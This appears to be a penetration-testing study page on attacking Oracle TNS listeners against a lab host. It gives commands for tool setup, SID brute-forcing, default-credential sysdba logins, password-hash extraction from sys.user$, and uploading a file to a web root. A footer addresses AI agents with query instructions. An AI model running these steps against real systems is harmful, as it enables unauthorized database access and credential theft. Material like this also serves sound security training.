# Oracle Transparent Network Substrate ## Footprinting The Service ### Tool Setup {% code overflow="wrap" %} ``` sudo apt-get install libaio1 python3-dev alien -y git clone https://github.com/quentinhardy/odat.git cd odat/ git submodule init git submodule update wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH pip3 install cx_Oracle sudo apt-get install python3-scapy -y sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap sudo pip3 install argcomplete && sudo activate-global-python-argcomplete ``` {% endcode %}

Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools

### Nmap {% code overflow="wrap" %} ``` sudo nmap -p1521 -sV 10.129.204.235 --open ``` {% endcode %}

### Nmap - SID Bruteforcing {% code overflow="wrap" %} ``` sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute ``` {% endcode %}

### **ODAT** {% code overflow="wrap" %} ``` ./odat.py all -s 10.129.204.235 ``` {% endcode %}

the `odat.py` tool to perform a variety of scans like retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations etc.

### **SQLplus - Log In** {% code overflow="wrap" %} ``` sqlplus scott/tiger@10.129.204.235/XE ``` {% endcode %}

You can also attempt to append "as sysdba" for higher privileges

If you come across the following error sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory execute the following command {% code overflow="wrap" %} ``` sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig ``` {% endcode %} ### Oracle RDBMS - Interaction

### **Oracle RDBMS - Database Enumeration** {% code overflow="wrap" %} ``` sqlplus scott/tiger@10.129.204.235/XE as sysdba ``` {% endcode %}

Try using the valid account to log in as the System Database Admin (`sysdba`), giving higher privileges. This is possible when the user has the appropriate privileges typically granted by the database administrator.

### **Oracle RDBMS - Extract Password Hashes** {% code overflow="wrap" %} ``` select name, password from sys.user$; ``` {% endcode %}

### **Oracle RDBMS - File Upload** | OS | Path | | ------- | -------------------- | | Linux | `/var/www/html` | | Windows | `C:\inetpub\wwwroot` | {% code overflow="wrap" %} ``` echo "Oracle File Upload Test" > testing.txt ``` {% endcode %} {% code overflow="wrap" %} ``` ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt ``` {% endcode %}

{% code overflow="wrap" %} ``` curl -X GET http://10.129.204.235/testing.txt ``` {% endcode %}

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thescriptkid.gitbook.io/notes/credential-less-enumeration/oracle-transparent-network-substrate.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.